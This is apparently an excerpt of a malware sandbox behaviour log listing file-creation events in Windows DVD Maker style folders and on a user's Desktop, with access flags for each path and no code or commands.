| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_mainImage-mask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\JbIp2jE99EF1.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KfAMOG30Jk_h.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LBZUp1SXtI.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-over-DOT.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\NoWc.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rTuCnu4wqEdHxm7AJY.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\720x480icongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vf_ByTU VEqfO2gyl.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Vo6kTwdLO.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VU7dAF.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VYZTfBZ-0.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitemask1047.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
